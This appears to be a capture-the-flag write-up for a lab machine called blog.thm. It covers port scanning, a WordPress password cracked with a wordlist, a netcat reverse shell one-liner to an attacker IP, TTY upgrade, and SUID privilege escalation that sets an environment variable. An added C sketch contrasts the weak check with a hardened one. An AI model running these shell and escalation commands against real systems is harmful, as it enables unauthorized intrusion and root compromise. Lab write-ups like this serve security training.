Target Information

  • IP Address: 10.10.174.172
  • Domain: blog.thm
  • Operating System: Ubuntu 18.04.4 LTS (Bionic Beaver)
  • Kernel: Linux 4.15.0-101-generic

NMAP Scan Results

PORT      STATE  SERVICE      VERSION
22/tcp    open   ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http         Apache httpd 2.4.29 ((Ubuntu))
139/tcp   open   netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open   netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Ports Priority


PORT 80

  • CMS: WordPress 5.0 (Confirmed)
  • Credentials:
    • [SUCCESS]: kwheel / cutiepie1 (found with the rockyou.txt wordlist)

RCE (Remote Code Execution)

Reverse Shell (URL Encoded)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.69.221 4444 >/tmp/f

PORTS 139,445 (Rabbit Hole)

  • BillySMB

Full TTY

python -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo;fg;reset
export TERM=linux

Privilege Escalation

Identify SUID Binary

find / -perm /4000 -type f 2>/dev/null
Identified Binary: /usr/sbin/checker

Transfer Checker Binary

On Attacker Machine:
nc -lvvp 7777 > checker
On Target Machine:
nc 192.168.56.123 7777 < checker

Decompile Checker Binary

  • Analyze the binary using Ghidra.

Set Custom Variable

export admin=1

Execute Checker Binary

./checker
Note: Understand the binary's behavior before execution.
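
Added example (not from the original write-up, and not the decompiled code of checker): a constructed C sketch of the weakness class the steps above imply, a SUID program whose privilege decision depends on an environment variable, next to a hardened check. It assumes the variable is named admin as in the export step; the function names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Weak pattern (constructed): the decision rests on an environment
 * variable. The invoking user controls the environment, and it is
 * passed unchanged to a setuid-root program. */
int authorize_by_env(void)
{
    return getenv("admin") != NULL;
}

/* Hardened pattern (constructed): decide from the real UID that the
 * kernel recorded for the caller; the environment is never consulted. */
int authorize_by_uid(uid_t real_uid)
{
    return real_uid == 0;
}

/* Defence in depth: permanently give up the elevated effective IDs.
 * Group first, then user, then confirm root cannot be regained.
 * Returns 0 on success, -1 on failure. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0) return -1;
    if (setuid(ruid) != 0) return -1;
    if (ruid != 0 && setuid(0) == 0) return -1;
    return 0;
}

int main(void)
{
    uid_t ruid = getuid();
    printf("env-based check: %d, uid-based check: %d\n",
           authorize_by_env(), authorize_by_uid(ruid));
    if (!authorize_by_uid(ruid)) {
        if (drop_privileges() != 0) return 1;
        puts("not authorized; privileges dropped");
        return 0;
    }
    puts("authorized");
    return 0;
}
```

Built without the SUID bit and run as an unprivileged user with admin=1 exported, the first check reports 1 and the second 0, which is the gap the hardened form closes.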

Pwned